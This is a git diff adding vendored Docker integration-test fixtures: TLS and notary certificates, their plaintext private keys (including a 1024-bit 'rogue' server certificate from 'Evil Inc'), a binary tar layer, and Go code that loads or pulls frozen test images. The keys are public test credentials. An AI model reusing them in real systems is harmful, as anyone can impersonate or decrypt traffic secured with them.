+IzWNXfF42AhcbwAQYQJBAPVXtMYIJc9EZsz86ZcQiMPWUpCX5vnRmtwL8kKyR8D5 +4KfYeiowyFffSRMMcclwNHq7TgSXN+nIXM9WyzyzwikCQQDKbNA28AgZp9aT54HP +WnbeE2pmt+uk/zl/BtxJSoK6H+69Jec+lf7EgL7HgOWYRSNot4uQWu8IhsHLTiUq ++0FtAkEAqwlRxRy4/x24bP+D+QRV0/D97j93joFJbE4Hved7jlSlAV4xDGilwlyv +HNB4Iu5OJ6Gcaibhm+FKkmD3noHSwQJBAIpu3fokLzX0bS+bDFBU6qO3HXX/47xj ++tsfQvkwZrSI8AkU6c8IX0HdVhsz0FBRQAT2ORDQz1XCarfxykNZrwUCQQCGCBIc +BBCWzhHlswlGidWJg3HqqO6hPPClEr3B5G87oCsdeYwiO23XT6rUnoJXfJHp6oCW +5nCwDu5ZTP+khltg +-----END PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-rogue-cert.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-rogue-cert.pem new file mode 100644 index 0000000000..28feba6656 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-rogue-cert.pem @@ -0,0 +1,76 @@ +Certificate: + Data: + Version: 3 (0x2) + Serial Number: 3 (0x3) + Signature Algorithm: sha1WithRSAEncryption + Issuer: C=US, ST=CA, L=SanFrancisco, O=Evil Inc, OU=changeme, CN=changeme/name=changeme/emailAddress=mail@host.domain + Validity + Not Before: Feb 28 18:49:31 2014 GMT + Not After : Feb 26 18:49:31 2024 GMT + Subject: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=localhost/name=changeme/emailAddress=mail@host.domain + Subject Public Key Info: + Public Key Algorithm: rsaEncryption + Public-Key: (1024 bit) + Modulus: + 00:d1:08:58:24:60:a1:69:65:4b:76:46:8f:88:75: + 7c:49:3a:d8:03:cc:5b:58:c5:d1:bb:e5:f9:54:b9: + 75:65:df:7e:bb:fb:54:d4:b2:e9:6f:58:a2:a4:84: + 43:94:77:24:81:38:36:36:f0:66:65:26:e5:5b:2a: + 14:1c:a9:ae:57:7f:75:00:23:14:4b:61:58:e4:82: + aa:15:97:94:bd:50:35:0d:5d:18:18:ed:10:6a:bb: + d3:64:5a:eb:36:98:5b:58:a7:fe:67:48:c1:6c:3f: + 51:2f:02:65:96:54:77:9b:34:f9:a7:d2:63:54:6a: + 9e:02:5c:be:65:98:a4:b4:b5 + Exponent: 65537 (0x10001) + X509v3 extensions: + X509v3 Basic Constraints: + CA:FALSE + Netscape Cert Type: + SSL Server + Netscape Comment: + Easy-RSA Generated Server 
Certificate + X509v3 Subject Key Identifier: + 1F:E0:57:CA:CB:76:C9:C4:86:B9:EA:69:17:C0:F3:51:CE:95:40:EC + X509v3 Authority Key Identifier: + keyid:DC:A5:F1:76:DB:4E:CD:8E:EF:B1:23:56:1D:92:80:99:74:3B:EA:6F + DirName:/C=US/ST=CA/L=SanFrancisco/O=Evil Inc/OU=changeme/CN=changeme/name=changeme/emailAddress=mail@host.domain + serial:E7:21:1E:18:41:1B:96:83 + + X509v3 Extended Key Usage: + TLS Web Server Authentication + X509v3 Key Usage: + Digital Signature, Key Encipherment + Signature Algorithm: sha1WithRSAEncryption + 04:93:0e:28:01:94:18:f0:8c:7c:d3:0c:ad:e9:b7:46:b1:30: + 65:ed:68:7c:8c:91:cd:1a:86:66:87:4a:4f:c0:97:bc:f7:85: + 4b:38:79:31:b2:65:88:b1:76:16:9e:80:93:38:f4:b9:eb:65: + 00:6d:bb:89:e0:a1:bf:95:5e:80:13:8e:01:73:d3:f1:08:73: + 85:a5:33:75:0b:42:8a:a3:07:09:35:ef:d7:c6:58:eb:60:a3: + 06:89:a0:53:99:e2:aa:41:90:e0:1a:d2:12:4b:48:7d:c3:9c: + ad:bd:0e:5e:5f:f7:09:0c:5d:7c:86:24:dd:92:d5:b3:14:06: + c7:9f +-----BEGIN CERTIFICATE----- +MIIEKjCCA5OgAwIBAgIBAzANBgkqhkiG9w0BAQUFADCBnjELMAkGA1UEBhMCVVMx +CzAJBgNVBAgTAkNBMRUwEwYDVQQHEwxTYW5GcmFuY2lzY28xETAPBgNVBAoTCEV2 +aWwgSW5jMREwDwYDVQQLEwhjaGFuZ2VtZTERMA8GA1UEAxMIY2hhbmdlbWUxETAP +BgNVBCkTCGNoYW5nZW1lMR8wHQYJKoZIhvcNAQkBFhBtYWlsQGhvc3QuZG9tYWlu +MB4XDTE0MDIyODE4NDkzMVoXDTI0MDIyNjE4NDkzMVowgaMxCzAJBgNVBAYTAlVT +MQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUwEwYDVQQKEwxG +b3J0LUZ1bnN0b24xETAPBgNVBAsTCGNoYW5nZW1lMRIwEAYDVQQDEwlsb2NhbGhv +c3QxETAPBgNVBCkTCGNoYW5nZW1lMR8wHQYJKoZIhvcNAQkBFhBtYWlsQGhvc3Qu +ZG9tYWluMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDRCFgkYKFpZUt2Ro+I +dXxJOtgDzFtYxdG75flUuXVl3367+1TUsulvWKKkhEOUdySBODY28GZlJuVbKhQc +qa5Xf3UAIxRLYVjkgqoVl5S9UDUNXRgY7RBqu9NkWus2mFtYp/5nSMFsP1EvAmWW +VHebNPmn0mNUap4CXL5lmKS0tQIDAQABo4IBbzCCAWswCQYDVR0TBAIwADARBglg +hkgBhvhCAQEEBAMCBkAwNAYJYIZIAYb4QgENBCcWJUVhc3ktUlNBIEdlbmVyYXRl +ZCBTZXJ2ZXIgQ2VydGlmaWNhdGUwHQYDVR0OBBYEFB/gV8rLdsnEhrnqaRfA81HO +lUDsMIHTBgNVHSMEgcswgciAFNyl8XbbTs2O77EjVh2SgJl0O+pvoYGkpIGhMIGe 
+MQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNj +bzERMA8GA1UEChMIRXZpbCBJbmMxETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQD +EwhjaGFuZ2VtZTERMA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1h +aWxAaG9zdC5kb21haW6CCQDnIR4YQRuWgzATBgNVHSUEDDAKBggrBgEFBQcDATAL +BgNVHQ8EBAMCBaAwDQYJKoZIhvcNAQEFBQADgYEABJMOKAGUGPCMfNMMrem3RrEw +Ze1ofIyRzRqGZodKT8CXvPeFSzh5MbJliLF2Fp6Akzj0uetlAG27ieChv5VegBOO +AXPT8QhzhaUzdQtCiqMHCTXv18ZY62CjBomgU5niqkGQ4BrSEktIfcOcrb0OXl/3 +CQxdfIYk3ZLVsxQGx58= +-----END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-rogue-key.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-rogue-key.pem new file mode 100644 index 0000000000..10f7c65001 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-rogue-key.pem @@ -0,0 +1,16 @@ +-----BEGIN PRIVATE KEY----- +MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBANEIWCRgoWllS3ZG +j4h1fEk62APMW1jF0bvl+VS5dWXffrv7VNSy6W9YoqSEQ5R3JIE4NjbwZmUm5Vsq +FByprld/dQAjFEthWOSCqhWXlL1QNQ1dGBjtEGq702Ra6zaYW1in/mdIwWw/US8C +ZZZUd5s0+afSY1RqngJcvmWYpLS1AgMBAAECgYAJXh9dGfuB1qlIFqduDR3RxlJR +8UGSu+LHUeoXkuwg8aAjWoMVuSLe+5DmYIsKx0AajmNXmPRtyg1zRXJ7SltmubJ8 +6qQVDsRk6biMdkpkl6a9Gk2av40psD9/VPGxagEoop7IKYhf3AeKPvPiwVB2qFrl +1aYMZm0aMR55pgRajQJBAOk8IsJDf0beooDZXVdv/oe4hcbM9fxO8Cn3qzoGImqD +37LL+PCzDP7AEV3fk43SsZDeSk+LDX+h0o9nPyhzHasCQQDlb3aDgcQY9NaGLUWO +moOCB3148eBVcAwCocu+OSkf7sbQdvXxgThBOrZl11wwRIMQqh99c2yeUwj+tELl +3VcfAkBZTiNpCvtDIaBLge9RuZpWUXs3wec2cutWxnSTxSGMc25GQf/R+l0xdk2w +ChmvpktDUzpU9sN2aXn8WuY+EMX9AkEApbLpUbKPUELLB958RLA819TW/lkZXjrs +wZ3eSoR3ufM1rOqtVvyvBxUDE+wETWu9iHSFB5Ir2PA5J9JCGkbPmwJAFI1ndfBj +iuyU93nFX0p+JE2wVHKx4dMzKCearNKiJh/lGDtUq3REGgamTNUnG8RAITUbxFs+ +Z1hrIq8xYl2LOQ== +-----END PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/load/emptyLayer.tar b/vendor/github.com/docker/docker/integration-cli/fixtures/load/emptyLayer.tar new file mode 100644 index 
0000000000000000000000000000000000000000..beabb569ac1e7fea69848f79ffd77fb17b2487b0 GIT binary patch literal 30720 zcmeI4ZExeo5y$c* zovW*2`my-BS#-6VC#(TWylUoH;FtY>E>gSBdD(R?T)*vNRTtCjW{dQq*rhc~JiEJz zsl`J#iI?4n-S>-|RPWcb+PkO&p2Vj7>-wi+S}$j_7sXd|yt?(*H*av1 z+nj$j?T=M`^{U#O?d!U0Kio7`Pi=kdMg6yBHQQD7cjwb=bNHthMQp;4h~=l$E~*AE zuwWB8>5;iMTvuHR-Lmal{@LpHT4MUleZcZ73oou6S9)q>^d-k>oX_}Qcxyo^p;T#I z4yBjEs}MP78A@rGh|&6(B$v4q&IKEaPbcYiRLK(|Fm&Lbue#U-=g_}>K?m>u=o9SE z|2Wfh|Nm{EC(M}~AUk1=_?|0jAs(MS-F>HlGq1Fv!G%u}F zxq~RdI2NK#f|*#Nn~(V{vFLOO8UqEuV@wWH0lWbP;+XE!kN?B|zvfDCV+{KLI33XJ zG420+{r|!CKbik8jnddl(C`@lF&t?A{}{IbApid{FhAKg29N*Y{y*OI0q1{v<6mif z{ttd8A4C0_$Nx6||IluLzUGZ<*Y1BAOzlPXfBaM3-28d; z^3|(Ru4ZY9j6K(!m62PF7=SBvvY>6u9_MkwI>$54a7OCT$T3-m=lJE( zmUnm}hhi;&u@=Bq+_JlF`T)-5bsBwzUH;iw#FV;!sB`|AkTbLnLJ;j*XJ0q(@q+&r#AY7K_tidj`Je@64Y zt^SAcHvH+*phv{y_9nO&aXZ27@H1gNA7uuCn|I7u4AJ4h5%>!(#?o4@01sM9=?Y<}U-wbn}~IT=+q) zpnU-y`(0?Hj|bqk-Cup*+8>Y5g-CYfCvx)B0vO)01+SpM1Tko z0U|&IhyW2F0z`la5CI}U1c(3;cp3zTzMXo^%Y*&eXctdy*>?6A8Sq zp|r}Cz7&k%LWj}|qk_p@3pT0=6BEu*_dHZBTzvXOYO{wlC)G^^hyW2F0z`la5CI}U k1c(3;AOb{y2oM1xKm>>Y5g-CYfCvx)B0vO)z%wTBe{YUtx&QzG literal 0 HcmV?d00001 diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/load/frozen.go b/vendor/github.com/docker/docker/integration-cli/fixtures/load/frozen.go new file mode 100644 index 0000000000..13cd393f36 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/load/frozen.go @@ -0,0 +1,182 @@ +package load + +import ( + "bufio" + "bytes" + "os" + "os/exec" + "path/filepath" + "strings" + "sync" + + "github.com/pkg/errors" +) + +var frozenImgDir = "/docker-frozen-images" + +// FrozenImagesLinux loads the frozen image set for the integration suite +// If the images are not available locally it will download them +// TODO: This loads whatever is in the frozen image dir, regardless of what +// images were passed in. 
If the images need to be downloaded, then it will respect +// the passed in images +func FrozenImagesLinux(dockerBinary string, images ...string) error { + imgNS := os.Getenv("TEST_IMAGE_NAMESPACE") + var loadImages []struct{ srcName, destName string } + for _, img := range images { + if err := exec.Command(dockerBinary, "inspect", "--type=image", img).Run(); err != nil { + srcName := img + // hello-world:latest gets re-tagged as hello-world:frozen + // there are some tests that use hello-world:latest specifically so it pulls + // the image and hello-world:frozen is used for when we just want a super + // small image + if img == "hello-world:frozen" { + srcName = "hello-world:latest" + } + if imgNS != "" { + srcName = imgNS + "/" + srcName + } + loadImages = append(loadImages, struct{ srcName, destName string }{ + srcName: srcName, + destName: img, + }) + } + } + if len(loadImages) == 0 { + // everything is loaded, we're done + return nil + } + + fi, err := os.Stat(frozenImgDir) + if err != nil || !fi.IsDir() { + srcImages := make([]string, 0, len(loadImages)) + for _, img := range loadImages { + srcImages = append(srcImages, img.srcName) + } + if err := pullImages(dockerBinary, srcImages); err != nil { + return errors.Wrap(err, "error pulling image list") + } + } else { + if err := loadFrozenImages(dockerBinary); err != nil { + return err + } + } + + for _, img := range loadImages { + if img.srcName != img.destName { + if out, err := exec.Command(dockerBinary, "tag", img.srcName, img.destName).CombinedOutput(); err != nil { + return errors.Errorf("%v: %s", err, string(out)) + } + if out, err := exec.Command(dockerBinary, "rmi", img.srcName).CombinedOutput(); err != nil { + return errors.Errorf("%v: %s", err, string(out)) + } + } + } + return nil +} + +func loadFrozenImages(dockerBinary string) error { + tar, err := exec.LookPath("tar") + if err != nil { + return errors.Wrap(err, "could not find tar binary") + } + tarCmd := exec.Command(tar, "-cC", frozenImgDir, 
".") + out, err := tarCmd.StdoutPipe() + if err != nil { + return errors.Wrap(err, "error getting stdout pipe for tar command") + } + + errBuf := bytes.NewBuffer(nil) + tarCmd.Stderr = errBuf + tarCmd.Start() + defer tarCmd.Wait() + + cmd := exec.Command(dockerBinary, "load") + cmd.Stdin = out + if out, err := cmd.CombinedOutput(); err != nil { + return errors.Errorf("%v: %s", err, string(out)) + } + return nil +} + +func pullImages(dockerBinary string, images []string) error { + cwd, err := os.Getwd() + if err != nil { + return errors.Wrap(err, "error getting path to dockerfile") + } + dockerfile := os.Getenv("DOCKERFILE") + if dockerfile == "" { + dockerfile = "Dockerfile" + } + dockerfilePath := filepath.Join(filepath.Dir(filepath.Clean(cwd)), dockerfile) + pullRefs, err := readFrozenImageList(dockerfilePath, images) + if err != nil { + return errors.Wrap(err, "error reading frozen image list") + } + + var wg sync.WaitGroup + chErr := make(chan error, len(images)) + for tag, ref := range pullRefs { + wg.Add(1) + go func(tag, ref string) { + defer wg.Done() + if out, err := exec.Command(dockerBinary, "pull", ref).CombinedOutput(); err != nil { + chErr <- errors.Errorf("%v: %s", string(out), err) + return + } + if out, err := exec.Command(dockerBinary, "tag", ref, tag).CombinedOutput(); err != nil { + chErr <- errors.Errorf("%v: %s", string(out), err) + return + } + if out, err := exec.Command(dockerBinary, "rmi", ref).CombinedOutput(); err != nil { + chErr <- errors.Errorf("%v: %s", string(out), err) + return + } + }(tag, ref) + } + wg.Wait() + close(chErr) + return <-chErr +} + +func readFrozenImageList(dockerfilePath string, images []string) (map[string]string, error) { + f, err := os.Open(dockerfilePath) + if err != nil { + return nil, errors.Wrap(err, "error reading dockerfile") + } + defer f.Close() + ls := make(map[string]string) + + scanner := bufio.NewScanner(f) + for scanner.Scan() { + line := strings.Fields(scanner.Text()) + if len(line) < 3 { + 
continue + } + if !(line[0] == "RUN" && line[1] == "./contrib/download-frozen-image-v2.sh") { + continue + } + + frozenImgDir = line[2] + if line[2] == frozenImgDir { + frozenImgDir = filepath.Join(os.Getenv("DEST"), "frozen-images") + } + + for scanner.Scan() { + img := strings.TrimSpace(scanner.Text()) + img = strings.TrimSuffix(img, "\\") + img = strings.TrimSpace(img) + split := strings.Split(img, "@") + if len(split) < 2 { + break + } + + for _, i := range images { + if split[0] == i { + ls[i] = img + break + } + } + } + } + return ls, nil +} diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.crt b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.crt new file mode 100644 index 0000000000..2218f23c89 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.crt @@ -0,0 +1,21 @@ +-----BEGIN CERTIFICATE----- +MIIDhTCCAm2gAwIBAgIJAP2EcMN2UXPcMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNV +BAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMQ8wDQYD +VQQKEwZEb2NrZXIxEzARBgNVBAMTCmRlbGVnYXRpb24wHhcNMTYwOTI4MTc0ODQ4 +WhcNMjYwNjI4MTc0ODQ4WjBXMQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTAT +BgNVBAcTDFNhbkZyYW5jaXNjbzEPMA0GA1UEChMGRG9ja2VyMRMwEQYDVQQDEwpk +ZWxlZ2F0aW9uMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvgewhaYs +Ke5s2AM7xxKrT4A6n7hW17qSnBjonCcPcwTFmYqIOdxWjYITgJuHrTwB4ZhBqWS7 +tTsUUu6hWLMeB7Uo5/GEQAAZspKkT9G/rNKF9lbWK9PPhGGkeR01c/Q932m92Hsn +fCQ0Pp/OzD3nVTh0v9HKk+PObNMOCcqG87eYs4ylPRxs0RrE/rP+bEGssKQSbeCZ +wazDnO+kiatVgKQZ2CK23iFdRE1z2rzqVDeaFWdvBqrRdWnkOZClhlLgEQ5nK2yV +B6tSqOiI3MmHyHzIkGOQJp2/s7Pe0ckEkzsjTsJW8oKHlBBl6pRxHIKzNN4VFbeB +vvYvrogrDrC/owIDAQABo1QwUjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIF +oDATBgNVHSUEDDAKBggrBgEFBQcDAzAdBgNVHQ4EFgQUFoHfukRa6qGk1ncON64Z +ASKlZdkwDQYJKoZIhvcNAQELBQADggEBAEq9Adpd03CPmpbRtTAJGAkjjLFr60sV +2r+/l/m9R31ZCN9ymM9nxToQ8zfMdeAh/nnPcErziil2gDVqXueCNDkRj09tmDIE +Q1Oc92uyNZNgcECow77cKZCTZSTku+qsJrYaykH5vSnia8ltcKj8inJedIcpBR+p 
+608HEQvF0Eg5eaLPJwH48BCb0Gqdri1dJgrNnqptz7MDr8M+u7tHVulbAd3YxLlq +JH1W2bkVUx6esbn/MUE5HL5iTuOYREEINvBSmLdmmFkampmCnCB/bDEyJeL9bAkt +ZPIi0UNSnqFKLSP1Vf8AGLXt6iO7+1OGvtsDXEEYdXVOMsSXZtUuT7A= +-----END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.key b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.key new file mode 100644 index 0000000000..cb37efc94a --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.key @@ -0,0 +1,27 @@ +-----BEGIN RSA PRIVATE KEY----- +MIIEpAIBAAKCAQEAvgewhaYsKe5s2AM7xxKrT4A6n7hW17qSnBjonCcPcwTFmYqI +OdxWjYITgJuHrTwB4ZhBqWS7tTsUUu6hWLMeB7Uo5/GEQAAZspKkT9G/rNKF9lbW +K9PPhGGkeR01c/Q932m92HsnfCQ0Pp/OzD3nVTh0v9HKk+PObNMOCcqG87eYs4yl +PRxs0RrE/rP+bEGssKQSbeCZwazDnO+kiatVgKQZ2CK23iFdRE1z2rzqVDeaFWdv +BqrRdWnkOZClhlLgEQ5nK2yVB6tSqOiI3MmHyHzIkGOQJp2/s7Pe0ckEkzsjTsJW +8oKHlBBl6pRxHIKzNN4VFbeBvvYvrogrDrC/owIDAQABAoIBAB/o8KZwsgfUhqh7 +WoViSCwQb0e0z7hoFwhpUl4uXPTGf1v6HEgDDPG0PwwgkdbwNaypQZVtWevj4NTQ +R326jjdjH1xbfQa2PZpz722L3jDqJR6plEtFxRoIv3KrCffPsrgabIu2mnnJJpDB +ixtW5cq0sT4ov2i4H0i85CWWwbSY/G/MHsvCuK9PhoCj9uToVqrf1KrAESE5q4fh +mPSYUL99KVnj7SZkUz+79rc8sLLPVks3szZACMlm1n05ZTj/d6Nd2ZZUO45DllIj +1XJghfWmnChrB/P/KYXgQ3Y9BofIAw1ra2y3wOZeqRFNsbmojcGldfdtN/iQzhEj +uk4ThokCgYEA9FTmv36N8qSPWuqX/KzkixDQ8WrDGohcB54kK98Wx4ijXx3i38SY +tFjO8YUS9GVo1+UgmRjZbzVX7xeum6+TdBBwOjNOxEQ4tzwiQBWDdGpli8BccdJ2 +OOIVxSslWhiUWfpYloXVetrR88iHbT882g795pbonDaJdXSLnij4UW8CgYEAxxrr +QFpsmOEZvI/yPSOGdG7A1RIsCeH+cEOf4cKghs7+aCtAHlIweztNOrqirl3oKI1r +I0zQl46WsaW8S/y99v9lmmnZbWwqLa4vIu0NWs0zaZdzKZw3xljMhgp4Ge69hHa2 +utCtAxcX+7q/yLlHoTiYwKdxX54iLkheCB8csw0CgYEAleEG820kkjXUIodJ2JwO +Tihwo8dEC6CeI6YktizRgnEVFqH0rCOjMO5Rc+KX8AfNOrK5PnD54LguSuKSH7qi +j04OKgWTSd43lF90+y63RtCFnibQDpp2HwrBJAQFk7EEP/XMJfnPLN/SbuMSADgM +kg8kPTFRW5Iw3DYz9z9WpE0CgYAkn6/8Q2XMbUOFqti9JEa8Lg8sYk5VdwuNbPMA +3QMYKQUk9ieyLB4c3Nik3+XCuyVUKEc31A5egmz3umu7cn8i6vGuiJ/k/8t2YZ7s 
+Bry5Ihu95Yzab5DW3Eiqs0xKQN79ebS9AluAwQO5Wy2h52rknfuDHIm/M+BHsSoS +xl5KFQKBgQCokCsYuX1z2GojHw369/R2aX3ovCGuHqy4k7fWxUrpHTHvth2+qNPr +84qLJ9rLWoZE5sUiZ5YdwCgW877EdfkT+v4aaBX79ixso5VdqgJ/PdnoNntah/Vq +njQiW1skn6/P5V/eyimN2n0VsyBr/zMDEtYTRP/Tb1zi/njFLQkZEA== +-----END RSA PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.crt b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.crt new file mode 100644 index 0000000000..bec084790a --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.crt @@ -0,0 +1,21 @@ +-----BEGIN CERTIFICATE----- +MIIDhTCCAm2gAwIBAgIJAIq8naKlYAQfMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNV +BAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMQ8wDQYD +VQQKEwZEb2NrZXIxEzARBgNVBAMTCmRlbGVnYXRpb24wHhcNMTYwOTI4MTc0ODQ4 +WhcNMjYwNjI4MTc0ODQ4WjBXMQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTAT +BgNVBAcTDFNhbkZyYW5jaXNjbzEPMA0GA1UEChMGRG9ja2VyMRMwEQYDVQQDEwpk +ZWxlZ2F0aW9uMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyY2EWYTW +5VHipw08t675upmD6a+akiuZ1z+XpuOxZCgjZ0aHfoOe8wGKg3Ohz7UCBdD5Mob/ +L/qvRlsCaqPHGZKIyyX1HDO4mpuQQFBhYxt+ZAO3AaawEUOw2rwwMDEjLnDDTSZM +z8jxCMvsJjBDqgb8g3z+AmjducQ/OH6llldgHIBY8ioRbROCL2PGgqywWq2fThav +c70YMxtKviBGDNCouYeQ8JMK/PuLwPNDXNQAagFHVARXiUv/ILHk7ImYnSGJUcuk +JTUGN2MBnpY0eakg7i+4za8sjjqOdn+2I6aVzlGJDSiRP72nkg/cE4BqMl9FrMwK +9iS8xa9yMDLUvwIDAQABo1QwUjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIF +oDATBgNVHSUEDDAKBggrBgEFBQcDAzAdBgNVHQ4EFgQUvQzzFmh3Sv3HcdExY3wx +/1u6JLAwDQYJKoZIhvcNAQELBQADggEBAJcmDme2Xj/HPUPwaN/EyCmjhY73EiHO +x6Pm16tscg5JGn5A+u3CZ1DmxUYl8Hp6MaW/sWzdtL0oKJg76pynadCWh5EacFR8 +u+2GV/IcN9mSX6JQzvrqbjSqo5/FehqBD+W5h3euwwApWA3STAadYeyEfmdOA3SQ +W1vzrA1y7i8qgTqeJ7UX1sEAXlIhBK2zPYaMB+en+ZOiPyNxJYj6IDdGdD2paC9L +6H9wKC+GAUTSdCWp89HP7ETSXEGr94AXkrwU+qNsiN+OyK8ke0EMngEPh5IQoplw +/7zEZCth3oKxvR1/4S5LmTVaHI2ZlbU4q9bnY72G4tw8YQr2gcBGo4w= +-----END CERTIFICATE----- diff --git 
a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.key b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.key new file mode 100644 index 0000000000..5ccabe908f --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.key @@ -0,0 +1,27 @@ +-----BEGIN RSA PRIVATE KEY----- +MIIEogIBAAKCAQEAyY2EWYTW5VHipw08t675upmD6a+akiuZ1z+XpuOxZCgjZ0aH +foOe8wGKg3Ohz7UCBdD5Mob/L/qvRlsCaqPHGZKIyyX1HDO4mpuQQFBhYxt+ZAO3 +AaawEUOw2rwwMDEjLnDDTSZMz8jxCMvsJjBDqgb8g3z+AmjducQ/OH6llldgHIBY +8ioRbROCL2PGgqywWq2fThavc70YMxtKviBGDNCouYeQ8JMK/PuLwPNDXNQAagFH +VARXiUv/ILHk7ImYnSGJUcukJTUGN2MBnpY0eakg7i+4za8sjjqOdn+2I6aVzlGJ +DSiRP72nkg/cE4BqMl9FrMwK9iS8xa9yMDLUvwIDAQABAoIBAHmffvzx7ydESWwa +zcfdu26BkptiTvjjfJrqEd4wSewxWGPKqJqMXE8xX99A2KTZClZuKuH1mmnecQQY +iRXGrK9ewFMuHYGeKEiLlPlqR8ohXhyGLVm+t0JDwaXMp5t9G0i73O5iLTm5fNGd +FGxa9YnVW20Q8MqNczbVGH1D1zInhxzzOyFzBd4bBBJ8PdrUdyLpd7+RxY2ghnbT +p9ZANR2vk5zmDLJgZx72n/u+miJWuhY6p0v3Vq4z/HHgdhf+K6vpDdzTcYlA0rO4 +c/c+RKED3ZadGUD5QoLsmEN0e3FVSMPN1kt4ZRTqWfH8f2X4mLz33aBryTjktP6+ +1rX6ThECgYEA74wc1Tq23B5R0/GaMm1AK3Ko2zzTD8wK7NSCElh2dls02B+GzrEB +aE3A2GMQSuzb+EA0zkipwANBaqs3ZemH5G1pu4hstQsXCMd4jAJn0TmTXlplXBCf +PSc8ZUU6XcJENRr9Q7O9/TGlgahX+z0ndxYx/CMCsSu7XsMg4IZsbAcCgYEA12Vb +wKOVG15GGp7pMshr+2rQfVimARUP4gf3JnQmenktI4PfdnMW3a4L3DEHfLhIerwT +6lRp/NpxSADmuT4h1UO1l2lc+gmTVPw0Vbl6VwHpgS5Kfu4ZyM6n3S66f/dE4nu7 +hQF9yZz7vn5Agghak4p6a1wC1gdMzR1tvxFzk4kCgYByBMTskWfcWeok8Yitm+bB +R3Ar+kWT7VD97SCETusD5uG+RTNLSmEbHnc+B9kHcLo67YS0800pAeOvPBPARGnU +RmffRU5I1iB+o0MzkSmNItSMQoagTaEd4IEUyuC/I+qHRHNsOC+kRm86ycAm67LP +MhdUpe1wGxqyPjp15EXTHQKBgDKzFu+3EWfJvvKRKQ7dAh3BvKVkcl6a2Iw5l8Ej +YdM+JpPPfI/i8yTmzL/dgoem0Nii4IUtrWzo9fUe0TAVId2S/HFRSaNJEbbVTnRH +HjbQqmfPv5U08jjD+9siHp/0UfCFc1QRT8xe+RqTmReCY9+KntoaZEiAm2FEZgqt +TukRAoGAf7QqbTP5/UH1KSkX89F5qy/6GS3pw6TLj9Ufm/l/NO8Um8gag6YhEKWR +7HpkpCqjfWj8Av8ESR9cqddPGrbdqXFm9z7dCjlAd5T3Q3h/h+v+JzLQWbsI6WOb +SsOSWNyE006ZZdIiFwO6GfxpLI24sVtYKgyob6Q71oxSqfnrnT0= 
+-----END RSA PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.crt b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.crt new file mode 100644 index 0000000000..f434b45fc8 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.crt @@ -0,0 +1,21 @@ +-----BEGIN CERTIFICATE----- +MIIDhTCCAm2gAwIBAgIJAKHt/jxiWqMtMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNV +BAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMQ8wDQYD +VQQKEwZEb2NrZXIxEzARBgNVBAMTCmRlbGVnYXRpb24wHhcNMTYwOTI4MTc0ODQ5 +WhcNMjYwNjI4MTc0ODQ5WjBXMQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTAT +BgNVBAcTDFNhbkZyYW5jaXNjbzEPMA0GA1UEChMGRG9ja2VyMRMwEQYDVQQDEwpk +ZWxlZ2F0aW9uMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqfbJk2Dk +C9FJVjV2+Q2CQrJphG3vFc1Qlu9jgVA5RhGmF9jJzetsclsV/95nBhinIGcSmPQA +l318G7Bz/cG/6O2n5+hj+S1+YOvQweReZj3d4kCeS86SOyLNTpMD9gsF0S8nR1RN +h0jD4t1vxAVeGD1o61U8/k0O5eDoeOfOSWZagKk5PhyrMZgNip4IrG46umCkFlrw 